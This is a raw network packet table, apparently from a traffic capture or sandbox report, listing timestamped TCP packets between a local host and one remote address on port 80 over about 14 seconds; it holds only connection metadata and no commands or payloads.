Nov 25, 2021 10:53:25.882853985 CET	50469	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.916794062 CET	80	50469	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.917002916 CET	50469	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.951040030 CET	80	50469	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.969530106 CET	80	50469	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.969584942 CET	80	50469	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:25.969866991 CET	50469	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:25.969950914 CET	50469	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.004157066 CET	80	50469	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.349343061 CET	50470	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.383462906 CET	80	50470	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.383707047 CET	50470	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.385596037 CET	50470	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.419625044 CET	80	50470	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.419796944 CET	50470	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.453809023 CET	80	50470	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.469978094 CET	80	50470	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.470042944 CET	80	50470	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.470276117 CET	50470	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.470333099 CET	50470	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.504352093 CET	80	50470	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.851162910 CET	50471	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.884669065 CET	80	50471	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.884982109 CET	50471	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.886543989 CET	50471	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.919944048 CET	80	50471	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.920208931 CET	50471	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.953588009 CET	80	50471	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.969342947 CET	80	50471	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.969393015 CET	80	50471	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:26.969527960 CET	50471	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:26.969578028 CET	50471	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.002978086 CET	80	50471	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.315928936 CET	50472	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.349044085 CET	80	50472	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.349303007 CET	50472	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.350877047 CET	50472	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.384042025 CET	80	50472	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.384341002 CET	50472	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.417753935 CET	80	50472	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.433881998 CET	80	50472	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.433944941 CET	80	50472	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.434173107 CET	50472	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.434225082 CET	50472	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.467401981 CET	80	50472	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.810986996 CET	50473	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.844926119 CET	80	50473	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.845155954 CET	50473	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.846662998 CET	50473	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.880573988 CET	80	50473	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.880913019 CET	50473	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.914958000 CET	80	50473	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.932095051 CET	80	50473	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.932120085 CET	80	50473	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:27.932414055 CET	50473	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.932445049 CET	50473	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:27.966542959 CET	80	50473	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.320195913 CET	50474	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.353641987 CET	80	50474	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.353822947 CET	50474	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.355335951 CET	50474	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.388807058 CET	80	50474	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.388993979 CET	50474	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.422595024 CET	80	50474	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.439199924 CET	80	50474	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.439265013 CET	80	50474	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.439551115 CET	50474	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.439646959 CET	50474	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.473104000 CET	80	50474	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.827157021 CET	50475	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.860512018 CET	80	50475	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.860806942 CET	50475	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.862322092 CET	50475	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.895827055 CET	80	50475	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.896070957 CET	50475	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.929668903 CET	80	50475	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.948648930 CET	80	50475	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.948714018 CET	80	50475	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:28.949028969 CET	50475	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.949127913 CET	50475	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:28.982861996 CET	80	50475	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.337023973 CET	50476	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.371121883 CET	80	50476	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.371277094 CET	50476	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.372843027 CET	50476	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.406891108 CET	80	50476	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.407104015 CET	50476	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.441117048 CET	80	50476	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.457895041 CET	80	50476	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.457951069 CET	80	50476	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.458100080 CET	50476	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.458156109 CET	50476	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.492371082 CET	80	50476	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.808195114 CET	50477	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.841382027 CET	80	50477	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.841578007 CET	50477	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.843203068 CET	50477	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.876363039 CET	80	50477	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.876607895 CET	50477	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.909775019 CET	80	50477	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.926882029 CET	80	50477	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.926945925 CET	80	50477	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:29.927454948 CET	50477	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.927515030 CET	50477	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:29.960942984 CET	80	50477	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.273957014 CET	50478	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.307113886 CET	80	50478	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.307301998 CET	50478	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.308855057 CET	50478	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.341993093 CET	80	50478	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.342288971 CET	50478	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.375729084 CET	80	50478	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.405215025 CET	80	50478	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.405278921 CET	80	50478	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.405596972 CET	50478	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.405694008 CET	50478	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.439310074 CET	80	50478	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.751566887 CET	50479	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.785007000 CET	80	50479	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.785285950 CET	50479	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.786736012 CET	50479	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.820252895 CET	80	50479	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.820492029 CET	50479	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.853914976 CET	80	50479	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.869714975 CET	80	50479	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.869757891 CET	80	50479	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:30.869899035 CET	50479	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.869952917 CET	50479	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:30.903556108 CET	80	50479	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.261049032 CET	50480	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.295120955 CET	80	50480	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.295389891 CET	50480	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.296933889 CET	50480	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.330858946 CET	80	50480	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.331038952 CET	50480	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.365087032 CET	80	50480	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.403213978 CET	80	50480	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.403283119 CET	80	50480	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.403429985 CET	50480	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.403489113 CET	50480	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.437550068 CET	80	50480	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.772998095 CET	50481	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.806444883 CET	80	50481	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.806642056 CET	50481	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.808199883 CET	50481	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.841537952 CET	80	50481	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.841713905 CET	50481	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.875260115 CET	80	50481	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.902401924 CET	80	50481	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.902466059 CET	80	50481	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:31.902616024 CET	50481	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.902678013 CET	50481	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:31.936275959 CET	80	50481	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.295938015 CET	50482	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.330105066 CET	80	50482	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.330351114 CET	50482	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.331859112 CET	50482	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.365890026 CET	80	50482	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.366100073 CET	50482	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.400252104 CET	80	50482	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.417025089 CET	80	50482	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.417089939 CET	80	50482	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.417382002 CET	50482	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.417479038 CET	50482	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.451775074 CET	80	50482	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.762732983 CET	50483	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.795891047 CET	80	50483	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.796041965 CET	50483	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.797645092 CET	50483	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.830666065 CET	80	50483	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.830811024 CET	50483	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.863926888 CET	80	50483	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.903328896 CET	80	50483	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.903412104 CET	80	50483	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:32.903598070 CET	50483	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.903660059 CET	50483	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:32.937048912 CET	80	50483	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.289422035 CET	50484	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.323637962 CET	80	50484	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.323883057 CET	50484	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.325393915 CET	50484	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.359412909 CET	80	50484	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.359611988 CET	50484	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.393671989 CET	80	50484	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.412101984 CET	80	50484	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.412178993 CET	80	50484	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.412288904 CET	50484	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.412352085 CET	50484	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.446508884 CET	80	50484	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.809554100 CET	50485	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.843702078 CET	80	50485	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.843926907 CET	50485	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.845489979 CET	50485	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.879544020 CET	80	50485	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.879756927 CET	50485	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.913850069 CET	80	50485	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.935188055 CET	80	50485	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.935211897 CET	80	50485	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:33.935791016 CET	50485	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.935825109 CET	50485	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:33.969676971 CET	80	50485	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.231719017 CET	50486	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.264987946 CET	80	50486	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.265219927 CET	50486	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.266818047 CET	50486	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.300158024 CET	80	50486	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.300400019 CET	50486	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.333909988 CET	80	50486	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.350164890 CET	80	50486	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.350220919 CET	80	50486	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.350513935 CET	50486	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.350598097 CET	50486	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.384324074 CET	80	50486	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.741771936 CET	50487	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.775933981 CET	80	50487	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.776137114 CET	50487	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.777721882 CET	50487	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.811736107 CET	80	50487	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.811966896 CET	50487	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.846106052 CET	80	50487	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.861690998 CET	80	50487	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.861746073 CET	80	50487	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:34.862018108 CET	50487	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.862099886 CET	50487	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:34.896337032 CET	80	50487	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.272914886 CET	50488	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.307024002 CET	80	50488	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.307265997 CET	50488	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.308824062 CET	50488	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.342839956 CET	80	50488	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.343022108 CET	50488	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.377038956 CET	80	50488	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.395204067 CET	80	50488	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.395256996 CET	80	50488	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.395438910 CET	50488	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.395492077 CET	50488	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.429495096 CET	80	50488	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.727229118 CET	50489	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.760370016 CET	80	50489	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.760687113 CET	50489	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.762264967 CET	50489	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.795264959 CET	80	50489	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.795502901 CET	50489	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.828613043 CET	80	50489	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.844363928 CET	80	50489	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.844413042 CET	80	50489	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:35.844645977 CET	50489	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.844697952 CET	50489	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:35.878083944 CET	80	50489	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.222695112 CET	50490	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.256794930 CET	80	50490	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.257029057 CET	50490	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.258620024 CET	50490	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.292843103 CET	80	50490	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.293025970 CET	50490	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.327035904 CET	80	50490	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.343269110 CET	80	50490	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.343319893 CET	80	50490	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.343466997 CET	50490	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.343518972 CET	50490	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.377665997 CET	80	50490	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.736938953 CET	50491	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.770344019 CET	80	50491	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.770642042 CET	50491	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.772211075 CET	50491	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.805387974 CET	80	50491	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.805632114 CET	50491	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.838773966 CET	80	50491	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.854226112 CET	80	50491	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.854275942 CET	80	50491	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:36.854443073 CET	50491	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.854502916 CET	50491	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:36.888039112 CET	80	50491	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.233417988 CET	50492	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.266871929 CET	80	50492	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.267059088 CET	50492	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.268574953 CET	50492	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.302037954 CET	80	50492	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.302251101 CET	50492	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.335779905 CET	80	50492	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.351679087 CET	80	50492	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.351757050 CET	80	50492	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.351910114 CET	50492	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.351953983 CET	50492	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.385288000 CET	80	50492	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.730015993 CET	50493	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.764035940 CET	80	50493	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.764250994 CET	50493	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.770351887 CET	50493	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.804335117 CET	80	50493	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.804538012 CET	50493	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.838661909 CET	80	50493	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.854489088 CET	80	50493	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.854553938 CET	80	50493	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:37.854882002 CET	50493	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.854983091 CET	50493	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:37.889386892 CET	80	50493	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.233802080 CET	50494	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.267919064 CET	80	50494	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.268100023 CET	50494	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.269613981 CET	50494	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.303575993 CET	80	50494	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.303894043 CET	50494	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.337888956 CET	80	50494	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.353996992 CET	80	50494	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.354054928 CET	80	50494	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.354449987 CET	50494	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.354500055 CET	50494	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.388575077 CET	80	50494	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.674539089 CET	50495	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.707593918 CET	80	50495	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.708067894 CET	50495	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.709614038 CET	50495	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.742722988 CET	80	50495	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.742858887 CET	50495	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.776123047 CET	80	50495	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.800154924 CET	80	50495	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.800203085 CET	80	50495	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:38.800404072 CET	50495	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.800455093 CET	50495	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:38.833826065 CET	80	50495	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.171979904 CET	50496	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.206001997 CET	80	50496	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.206267118 CET	50496	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.207844973 CET	50496	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.241883993 CET	80	50496	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.242109060 CET	50496	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.276140928 CET	80	50496	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.300724030 CET	80	50496	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.300772905 CET	80	50496	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.300918102 CET	50496	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.300968885 CET	50496	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.335242033 CET	80	50496	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.697474003 CET	50497	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.730901003 CET	80	50497	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.731074095 CET	50497	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.732608080 CET	50497	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.765849113 CET	80	50497	176.223.209.128	192.168.11.20
Nov 25, 2021 10:53:39.766006947 CET	50497	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:53:39.799238920 CET	80	50497	176.223.209.128	192.168.11.20
